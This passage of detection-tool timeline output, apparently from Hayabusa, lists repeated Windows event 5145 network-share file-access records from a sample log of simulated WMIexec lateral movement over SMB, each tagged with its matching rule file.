\??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ 
| Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ 
| Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 